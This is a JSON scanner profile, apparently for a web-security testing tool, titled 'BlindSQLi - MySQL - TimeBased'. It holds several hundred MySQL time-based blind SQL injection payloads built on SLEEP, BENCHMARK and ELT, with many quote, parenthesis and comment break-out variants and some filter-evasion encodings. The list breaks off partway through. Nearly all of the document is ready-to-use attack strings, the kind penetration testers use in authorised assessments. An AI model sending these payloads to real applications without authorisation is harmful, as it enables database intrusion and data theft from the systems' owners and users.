[
  {
    "ProfileName": "BlindSQLi - MySQL - TimeBased",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,0\u0027XOR(if(now()\u003dsysdate(),sleep(15),0))XOR\u0027Z",
      "true,0\u0027XOR(if(now()\u003dsysdate(),sleep(15*1),0))XOR\u0027Z",
      "true,if(now()\u003dsysdate(),sleep(15),0)",
      "true,\u0027XOR(if(now()\u003dsysdate(),sleep(15),0))XOR\u0027",
      "true,\u0027XOR(if(now()\u003dsysdate(),sleep(15*1),0))OR\u0027",
      "true,0\u0027|(IF((now())LIKE(sysdate()),SLEEP(1),0))|\u0027Z",
      "true,0\u0027or(now()\u003dsysdate()\u0026\u0026SLEEP(1))or\u0027Z",
      "true,if(now()\u003dsysdate(),sleep(15),0)/\"XOR(if(now()\u003dsysdate(),sleep(15),0))OR\"/",
      "true,if(now()\u003dsysdate(),sleep(15),0)/*\u0027XOR(if(now()\u003dsysdate(),sleep(15),0))OR\u0027\"XOR(if(now()\u003dsysdate(),sleep(15),0))OR\"*/",
      "true,if(now()\u003dsysdate(),sleep(15),0)/\u0027XOR(if(now()\u003dsysdate(),sleep(15),0))OR\u0027\"XOR(if(now()\u003dsysdate(),sleep(15),0) and 15\u003d15)\"/",
      "true,if(1\u003d1,sleep(15),0)/*\u0027XOR(if(1\u003d1,sleep(15),0))OR\u0027\"XOR(if(1\u003d1,sleep(15),0))OR\"*/",
      "true,if(1337\u003d1337,exp(~(1)),0)/*\u0027XOR(if(1337\u003d1337,exp(~(1)),0))OR\u0027\"XOR(if(1337\u003d1337,sleep(15),0))OR\"*/",
      "true,SLEEP(15)/*\u0027 or SLEEP(15) or \u0027\" or SLEEP(15) or \"*/",
      "true,%2c(select%15*%15from%15(select(sleep(15)))a)",
      "true,(select(0)from(select(sleep(15)))v)",
      "true,(SELECT SLEEP(15))",
      "true,\u0027%2b(select*from(select(sleep(15)))a)%2b\u0027",
      "true,(select*from(select(sleep(15)))a)",
      "true,1\u0027%2b(select*from(select(sleep(15)))a)%2b\u0027",
      "true,,(select * from (select(sleep(15)))a)",
      "true,desc%2c(select*from(select(sleep(15)))a)",
      "true,-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(15))A))",
      "true,-1+or+1\u003d((SELECT+1+FROM+(SELECT+SLEEP(15))A))",
      "true,(SELECT * FROM (SELECT(SLEEP(15)))YYYY)",
      "true,(SELECT * FROM (SELECT(SLEEP(15)))YYYY)#",
      "true,(SELECT * FROM (SELECT(SLEEP(15)))YYYY)--",
      "true,\u0027+(select*from(select(sleep(15)))a)+\u0027",
      "true,(select(0)from(select(sleep(15)))v)%2f\u0027+(select(0)from(select(sleep(15)))v)+\u0027\"",
      "true,(select(0)from(select(sleep(15)))v)%2f*\u0027+(select(0)from(select(sleep(15)))v)+\u0027\"+(select(0)from(select(sleep(15)))v)+\"*%2f",
      "true,(select(0)from(select(sleep(15)))v)/*\u0027+(select(0)from(select(sleep(15)))v)+\u0027\"+(select(0)from(select(sleep(15)))v)+\"*/",
      "true,(select(0)from(select(sleep(15)))v)/*\u0027+(select(0)from(select(sleep(15)))v)+\u0027\\\"+(select(0)from(select(sleep(15)))v)+\\\"*/",
      "true,\u0027,\u0027\u0027),/*test*/%26%26%09sLeEp(15)%09--+",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (1337\u003d1337",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (\u0027PBiy\u0027\u003d\u0027PBiy",
      "true,) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (1337\u003d1337",
      "true,)) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND ((1337\u003d1337",
      "true,))) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (((1337\u003d1337",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)# 1337",
      "true,) WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,1 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,` WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,`) WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,`\u003d`1` AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY))|[1",
      "true,\u0027) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\" AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND (SELECT 3122 FROM (SELECT(SLEEP(15)))YYYY) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND (SELECT 4796 FROM (SELECT(SLEEP(15)))YYYY) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (\"1337\"\u003d\"1337",
      "true,\")) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND ((\"1337\"\u003d\"1337",
      "true,\"))) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (((\"1337\"\u003d\"1337",
      "true,\" AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND \"1337\"\u003d\"1337",
      "true,\") AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (\"1337\" LIKE \"1337",
      "true,\")) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND ((\"1337\" LIKE \"1337",
      "true,\"))) AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND (((\"1337\" LIKE \"1337",
      "true,\" AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) AND \"1337\" LIKE \"1337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\") WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,1 and sleep 15--",
      "true,1 and sleep 15",
      "true,1 and sleep(15)--",
      "true,1 and sleep(15)",
      "true,\u0027 and sleep 15--",
      "true,\u0027 and sleep 15",
      "true,\u0027 and sleep 15 and \u00271\u0027\u003d\u00271",
      "true,\u0027 and sleep(15) and \u00271\u0027\u003d\u00271",
      "true,\u0027 and sleep(15)--",
      "true,\u0027 and sleep(15)",
      "true,\u0027 AnD SLEEP(15) ANd \u00271",
      "true,and sleep 15--",
      "true,and sleep 15",
      "true,and sleep(15)--",
      "true,and sleep(15)",
      "true,and SELECT SLEEP(15); #",
      "true,AnD SLEEP(15)",
      "true,AnD SLEEP(15)--",
      "true,AnD SLEEP(15)#",
      "true,\u0027 AND SLEEP(15)#",
      "true,\" AND SLEEP(15)#",
      "true,\u0027) AND SLEEP(15)#",
      "true,\u0027 AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))--",
      "true,\u0027 AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\" AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) AND \u003dBENCHMARK(15000000,MD5(0x774c5341))--",
      "true,\u0027) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (\"1337\"\u003d\"1337",
      "true,\")) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND ((\"1337\"\u003d\"1337",
      "true,\"))) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (((\"1337\"\u003d\"1337",
      "true,\" AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND \"1337\"\u003d\"1337",
      "true,\") AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (\"1337\" LIKE \"1337",
      "true,\")) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND ((\"1337\" LIKE \"1337",
      "true,\"))) AND 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) AND (((\"1337\" LIKE \"1337",
      "true,\" AND 1337\u003dBENCHMARK(15000000,MD5(0x576e7a57)) AND \"1337\" LIKE \"1337",
      "true,\u0027 AND 1337\u003dBENCHMARK(15000000,MD5(0x576e7a57)) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))--",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\" OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR \u003dBENCHMARK(15000000,MD5(0x774c5341))--",
      "true,\u0027) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \"1337\"\u003d\"1337",
      "true,\") OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR 1337\u003dBENCHMARK(15000000,MD5(0x576e7a57)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x576e7a57)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(15))--",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\" AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) AND ELT(1337\u003d1337,SLEEP(15)) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND ELT(1337\u003d1337,SLEEP(15)) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) AND ELT(1337\u003d1337,SLEEP(15)) AND (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(15)) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND ELT(1337\u003d1337,SLEEP(15)) AND (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) AND ELT(1337\u003d1337,SLEEP(15)) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) AND ELT(1337\u003d1337,SLEEP(15)) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,) AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,) AND ELT(1337\u003d1337,SLEEP(15)) AND (1337\u003d1337",
      "true,)) AND ELT(1337\u003d1337,SLEEP(15)) AND ((1337\u003d1337",
      "true,))) AND ELT(1337\u003d1337,SLEEP(15)) AND (((1337\u003d1337",
      "true,1 AND ELT(1337\u003d1337,SLEEP(15))",
      "true,1 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 AND ELT(1337\u003d1337,SLEEP(15))# 1337",
      "true,) WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,` WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,`) WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1`\u003d`1` AND ELT(1337\u003d1337,SLEEP(15)) AND `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))|[1",
      "true,%\u0027 AND ELT(1337\u003d1337,SLEEP(15)) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(15)) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") AND ELT(1337\u003d1337,SLEEP(15)) AND (\"1337\"\u003d\"1337",
      "true,\")) AND ELT(1337\u003d1337,SLEEP(15)) AND ((\"1337\"\u003d\"1337",
      "true,\"))) AND ELT(1337\u003d1337,SLEEP(15)) AND (((\"1337\"\u003d\"1337",
      "true,\" AND ELT(1337\u003d1337,SLEEP(15)) AND \"1337\"\u003d\"1337",
      "true,\") AND ELT(1337\u003d1337,SLEEP(15)) AND (\"1337\" LIKE \"1337",
      "true,\")) AND ELT(1337\u003d1337,SLEEP(15)) AND ((\"1337\" LIKE \"1337",
      "true,\"))) AND ELT(1337\u003d1337,SLEEP(15)) AND (((\"1337\" LIKE \"1337",
      "true,\" AND ELT(1337\u003d1337,SLEEP(15)) AND \"1337\" LIKE \"1337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027\u003d\u0027FMTE",
      "true,\u0027) WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\") WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\" WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027||(SELECT 0x4c4154f67 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))||\u0027",
      "true,\u0027||(SELECT 0x727a15277 FROM DUAL WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))||\u0027",
      "true,\u0027+(SELECT 0x4b6b486c WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))+\u0027",
      "true,||(SELECT 0x15715156971 FROM DUAL WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))||",
      "true,||(SELECT 0x67664847 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))||",
      "true,+(SELECT 0x74764164 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15)))+",
      "true,\u0027)) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\")) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\") AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15))--",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(15)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(15)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,) OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,) OR ELT(1337\u003d1337,SLEEP(15)) OR (1337\u003d1337",
      "true,)) OR ELT(1337\u003d1337,SLEEP(15)) OR ((1337\u003d1337",
      "true,))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((1337\u003d1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(15))",
      "true,1 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(15))# 1337",
      "true,) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,` WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,`) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1`\u003d`1` OR ELT(1337\u003d1337,SLEEP(15)) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))|[1",
      "true,%\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(15)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(15)) OR \"1337\"\u003d\"1337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(15)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(15)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027\u003d\u0027FMTE",
      "true,\u0027) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\") WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\" WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027||(SELECT 0x4c4154f67 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||\u0027",
      "true,\u0027||(SELECT 0x727a15277 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||\u0027",
      "true,\u0027+(SELECT 0x4b6b486c WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))+\u0027",
      "true,||(SELECT 0x15715156971 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||",
      "true,||(SELECT 0x67664847 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||",
      "true,+(SELECT 0x74764164 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))+",
      "true,\u0027)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\")) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\") AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\u0027PBiy\u0027\u003d\u0027PBiy",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (1337\u003d1337",
      "true,)) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((1337\u003d1337",
      "true,))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)# 1337",
      "true,) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,1 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,` WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,`) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,`\u003d`1` OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY))|[1",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 3122 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 4796 FROM (SELECT(SLEEP(15)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\"1337\"\u003d\"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\"1337\"\u003d\"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \"1337\"\u003d\"1337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\"1337\" LIKE \"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\"1337\" LIKE \"1337",
